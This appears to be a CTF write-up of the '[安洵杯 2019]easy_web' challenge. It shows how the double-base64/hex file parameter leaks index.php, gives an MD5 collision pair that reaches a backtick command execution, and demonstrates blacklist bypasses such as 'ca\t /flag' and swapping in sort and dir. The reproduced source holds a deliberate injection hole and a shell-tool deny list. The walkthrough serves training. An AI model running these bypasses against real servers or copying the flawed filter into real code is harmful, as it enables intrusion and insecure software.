飞雪团队

[安洵杯 2019]easy_web

Posted on 2022-2-12 14:35:42

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens as shown, with the URL ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd= ; view the page source at the same time.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is a line "MD5 is funny" here, which suggests the challenge most likely involves MD5.</p>
<p>Then I captured the request; there was nothing special in the message headers, so I tried starting from the URL.</p>
<p>First, base64-decode that value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode the result still looks like base64, so decode it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode it, which gives:</p>
<div class="cnblogs_Highlighter">
<pre>555.png
</pre>
</div>
<p>Encode index.php the same way (the reverse of the steps above):</p>
<div class="cnblogs_Highlighter">
<pre>TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then enter it in the address bar.</p>
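<p>As an added illustration (not part of the original post), the following Python reproduces the decode chain the server applies to the img parameter, hex2bin(base64_decode(base64_decode($img))), and its reverse, so the two tokens above can be checked mechanically instead of by hand. The names decode_img, encode_img and server_file_check are assumptions made for this example; the filename check mirrors the preg_replace and /flag/i lines of the index.php source decoded below, and the sample token is the one from the challenge URL with its trailing "=" padding missing, which is the edge case the decoder has to tolerate.</p>

```python
import base64
import binascii
import re

# Constructed sample: the img token from the challenge URL as it appears in
# the query string (the trailing "=" padding is absent).
IMG_TOKEN = "TXpVek5UTTFNbVUzTURabE5qYz0"


def decode_img(token: str) -> str:
    """Reverse the server's hex2bin(base64_decode(base64_decode($img))) chain.

    PHP's base64_decode tolerates a token whose "=" padding was lost in the
    URL; Python's base64.b64decode does not, so the padding is restored first.
    """
    padded = token + "=" * (-len(token) % 4)
    inner = base64.b64decode(padded)        # first decode: still base64 text
    hex_name = base64.b64decode(inner)      # second decode: hex text
    return binascii.unhexlify(hex_name).decode()


def encode_img(filename: str) -> str:
    """Build the token the server will decode back to `filename`
    (hex, then base64 twice)."""
    hex_name = binascii.hexlify(filename.encode())
    return base64.b64encode(base64.b64encode(hex_name)).decode()


def server_file_check(token: str) -> tuple:
    """Assumed port of the filename handling in index.php (not the challenge's
    own code): strip everything except [a-zA-Z0-9.], then refuse any name
    containing 'flag' (case-insensitive). Returns (accepted, cleaned_name)."""
    name = re.sub(r"[^a-zA-Z0-9.]+", "", decode_img(token))
    if re.search(r"flag", name, re.I):
        return False, name          # the server answers "xixi~ no flag"
    return True, name


if __name__ == "__main__":
    print(decode_img(IMG_TOKEN))                    # 555.png
    print(encode_img("index.php"))                  # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    print(server_file_check(encode_img("index.php")))
    print(server_file_check(encode_img("flag")))    # refused
```

The padding step matters in practice: a browser or proxy that drops the trailing "=" produces a token PHP accepts but a strict decoder rejects, so a reimplementation that mirrors the server must be as lenient as the server is.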
<p>Then view the page source and decode the base64 string found in it:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>Combined with the earlier deduction, the key code is:</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This kind of MD5 check calls for an MD5 strong collision: two POST values that differ as strings but share the same MD5 digest.</p>
<div class="cnblogs_Highlighter">
<pre>a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre>b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>With just this, whatever is in cmd is handled as a command.</p>
<p>So the payload used is:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not filtered, the filter can be bypassed this way:</p>
<p>ls and l\s give the same result when the command is executed.</p>
<p>That showed a /flag in the root directory.</p>
<p>So the payload is:</p>
<div class="cnblogs_Highlighter">
<pre>?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not filtered either, dir can be used in place of ls to list files, and sort in place of cat.</p>
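<p>Added example, not part of the original post: the Python below carries the challenge's preg_match blacklist over to Python, after resolving PHP's double-quote escapes, and runs the strings named in this write-up through it alongside the check a hardened endpoint would use instead, an exact-match allowlist. The names BLACKLIST, blacklist_allows, allowlist_allows and compare and the allowlist contents are assumptions made for this example; the point it makes is that every inputs-pass-through-a-denylist design leaves gaps of this kind, while an allowlist has nothing to pattern-match.</p>

```python
import re

# Effective pattern of the preg_match() blacklist in index.php once PHP's
# double-quote escapes are resolved: "\\" becomes "\", "\n" "\t" "\r" "\xA0"
# become the raw characters, and the other backslash sequences are kept.
# Note that the source fragment "\\|\\\\" collapses to the two-character
# sequence "|\" (an escaped pipe followed by a backslash), not to a lone
# backslash, which is why a single "\" inside a word is not caught.
BLACKLIST = re.compile(
    r"""ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless"""
    r"""|pcre|paste|diff|file|echo|sh|'|"|`|;|,|\*|\?|\|\\|\n|\t|\r|\xA0|\{|\}"""
    r"""|\(|\)|&[^\d]|@|\||\$|\[|\]|\{|\}|\(|\)|-|<|>""",
    re.I,
)

# Constructed allowlist for the hardened variant: the only commands the
# endpoint is meant to run, with no user-supplied arguments at all.
ALLOWED_COMMANDS = frozenset({"date", "uptime", "whoami"})


def blacklist_allows(cmd: str) -> bool:
    """True when the challenge's filter would let `cmd` through to the shell."""
    return BLACKLIST.search(cmd) is None


def allowlist_allows(cmd: str) -> bool:
    """Hardened check: exact match against a fixed vocabulary. Spelling tricks
    and alternative binaries cannot help because nothing is pattern-matched."""
    return cmd in ALLOWED_COMMANDS


def compare(cmds) -> dict:
    """Run both checks over sample inputs; returns {cmd: (blacklist, allowlist)}."""
    return {c: (blacklist_allows(c), allowlist_allows(c)) for c in cmds}


if __name__ == "__main__":
    # Sample inputs: the strings this write-up names, plus one allowlisted
    # command for contrast.
    samples = ["ls", "l\\s", "cat /flag", "ca\\t /flag", "dir", "sort /flag", "date"]
    for cmd, (bl, al) in compare(samples).items():
        print(f"{cmd!r:16} blacklist passes={bl!s:5} allowlist passes={al}")
```

Reading the table this prints is the whole argument: the blacklist blocks the spellings it was written for and nothing else, whereas the allowlist admits only "date". Where the endpoint genuinely must run something on the user's behalf, the safe design is the allowlist plus an argv-style invocation without a shell, so there is no command string to filter in the first place.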